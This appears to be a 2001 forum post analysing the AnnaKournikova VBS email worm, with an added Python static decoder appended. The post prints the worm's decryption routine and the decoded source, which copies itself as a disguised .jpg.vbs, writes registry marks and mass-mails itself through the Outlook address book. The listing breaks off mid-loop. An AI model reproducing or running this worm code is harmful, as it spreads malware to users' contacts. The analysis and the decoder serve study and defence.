AnnaKournikova virus source code analysis
Copyright of this post belongs to the original author. Other websites must credit the source when reproducing it, and traditional media must contact the original author and E Dragon Western Hutan [http://www.xici.net] in advance before reprinting.
Author: hangsun
Issue Date: 2001-03-10 16:41:08

The AnnaKournikova virus is carried out by the VBS source code in its attachment. Although the code has been tampered with a little, it is still very easy to work out. The following is the source code of its attachment file (annotations added by me):

'vbs.onthefly created by onthefly
'Execute the code returned by the e7iqom5JE4z function. The e7iqom5JE4z function is actually a string conversion function; its role is to decrypt the virus code that was encrypted with a simple encryption algorithm. The parameter of the e7iqom5JE4z function is the encrypted virus source code string.
Execute e7iqom5JE4z("<encrypted virus source code string>")

'e7iqom5JE4z: the following is a simple string decryption function. Its logic is:
'a) characters whose ASC code is 15, 16 or 17 are converted to carriage return, line feed and space;
'b) the ASC code of every other character is reduced (by 2, as the code shows);
'c) the positions of each pair of adjacent characters are swapped.
Function e7iqom5JE4z(hFeiuKrcoj3)
    For i = 1 To Len(hFeiuKrcoj3) Step 2
        StTP1MoJ3ZU = Mid(hFeiuKrcoj3, i, 1)
        WHz23rBqlo7 = Mid(hFeiuKrcoj3, i + 1, 1)
        If Asc(StTP1MoJ3ZU) = 15 Then
            StTP1MoJ3ZU = Chr(10)
        ElseIf Asc(StTP1MoJ3ZU) = 16 Then
            StTP1MoJ3ZU = Chr(13)
        ElseIf Asc(StTP1MoJ3ZU) = 17 Then
            StTP1MoJ3ZU = Chr(32)
        Else
            StTP1MoJ3ZU = Chr(Asc(StTP1MoJ3ZU) - 2)
        End If
        If WHz23rBqlo7 <> "" Then
            If Asc(WHz23rBqlo7) = 15 Then
                WHz23rBqlo7 = Chr(10)
            ElseIf Asc(WHz23rBqlo7) = 16 Then
                WHz23rBqlo7 = Chr(13)
            ElseIf Asc(WHz23rBqlo7) = 17 Then
                WHz23rBqlo7 = Chr(32)
            Else
                WHz23rBqlo7 = Chr(Asc(WHz23rBqlo7) - 2)
            End If
        End If
        e7iqom5JE4z = e7iqom5JE4z & WHz23rBqlo7 & StTP1MoJ3ZU
    Next
End Function
'Vbswg 1.50b

According to the above transformation algorithm, I wrote a Delphi program that performs the same function (sorry, I don't know VB). After running the transformation, the true form of the virus source code is obtained. The following is the virus source code after I tidied it up with UltraEdit, with my personal annotations added.

'Vbs.onthefly created by onthefly
'Exception handling
On Error Resume Next
'Create the script shell object
Set shellObj = CreateObject("WScript.Shell")
'Write the registry data "Worm made with Vbswg 1.50b". A very indirect practice is used here: the string is pieced together from ASC codes.
'Maybe this is a hacker's style, but it has no real significance.
shellObj.regwrite "HKCU\Software\ONTHEFLY\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
'Create a file system object
Set fileSysObj = CreateObject("Scripting.FileSystemObject")
'Copy the virus source file to the system directory
fileSysObj.copyfile WScript.ScriptFullName, fileSysObj.GetSpecialFolder(0) & "\AnnaKournikova.jpg.vbs"
'Read the registry data; if the virus has not been propagated yet, send it to every mail address in the Outlook address book
If shellObj.regread("HKCU\Software\ONTHEFLY\MAILED") <> "1" Then
    mailBroadcast()
End If
'If it is the 26th, open a certain WWW site
If Month(Now) = 1 And Day(Now) = 26 Then
    shellObj.run "http://www.dynabyte.nl", 3, False
End If
'The following keeps the program on the hard disk (uncertain)
Set txtFile = fileSysObj.opentextfile(WScript.ScriptFullName, 1)
textStr = txtFile.readall
txtFile.Close
Do
    If Not (fileSysObj.fileexists(WScript.ScriptFullName)) Then
        Set scriptTxtFile = fileSysObj.createtextfile(WScript.ScriptFullName, True)
        scriptTxtFile.write textStr
        scriptTxtFile.Close
    End If
Loop
'Send mail to all addresses in the address book, and mark in the registry that it has been sent
Function mailBroadcast()
    On Error Resume Next
    Set outlookApp = CreateObject("Outlook.Application")
    If outlookApp = "Outlook" Then
        Set mapiObj = outlookApp.GetNameSpace("MAPI")
        Set addrList = mapiObj.AddressLists
        For Each addr In addrList
            If addr.AddressEntries.Count <> 0 Then
                addrEntCount = addr.AddressEntries.Count
                For addrEntIndex =
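
The e7iqom5JE4z decoding routine analysed earlier on this page, ported to Python as an added example (it is not the author's Delphi program and not code from the original post): it lifts the string out of the Execute call and decodes it statically, so nothing from the script is ever run. The sample string, the generic decoder-name match and the trait list are constructed assumptions.

```python
import re

# Control codes the decoder special-cases; every other character is shifted down by 2.
SPECIAL = {15: "\n", 16: "\r", 17: " "}

# Matches Execute <name>("<string>") so the payload can be lifted out statically.
# Assumption: the decoder name is matched generically rather than hard-coded.
CALL = re.compile(r'Execute\s+(\w+)\s*\(\s*"([^"]*)"\s*\)', re.IGNORECASE)

# Strings visible in the decoded listing on this page, used for quick triage.
TRAITS = ("wscript.shell", "regwrite", "copyfile", "scriptfullname",
          "outlook.application")


def _map(ch):
    # Code points 0 and 1 have no mapping; chr() raises ValueError for them.
    return SPECIAL.get(ord(ch), chr(ord(ch) - 2))


def decode(encoded):
    """Port of e7iqom5JE4z: map each character, then swap each adjacent pair."""
    out = []
    for i in range(0, len(encoded), 2):
        pair = encoded[i:i + 2]  # a single character when the length is odd
        out.append("".join(_map(c) for c in reversed(pair)))
    return "".join(out)


def extract_payloads(script_text):
    """Return (decoder_name, decoded_source) per Execute call, executing nothing."""
    return [(m.group(1), decode(m.group(2))) for m in CALL.finditer(script_text)]


def traits(decoded):
    """List which triage strings appear in the decoded source (case-insensitive)."""
    low = decoded.lower()
    return [t for t in TRAITS if t in low]


# Constructed sample (not the worm): encodes the harmless text 'x = 1\r\nWScript.Echo x'.
SAMPLE = ("'constructed sample\r\n"
          'Execute e7iqom5JE4z("\x11z\x11?\x103Y\x0feUktvrG0je\x11qz")\r\n')

if __name__ == "__main__":
    for name, source in extract_payloads(SAMPLE):
        print(name, repr(source), traits(source))
```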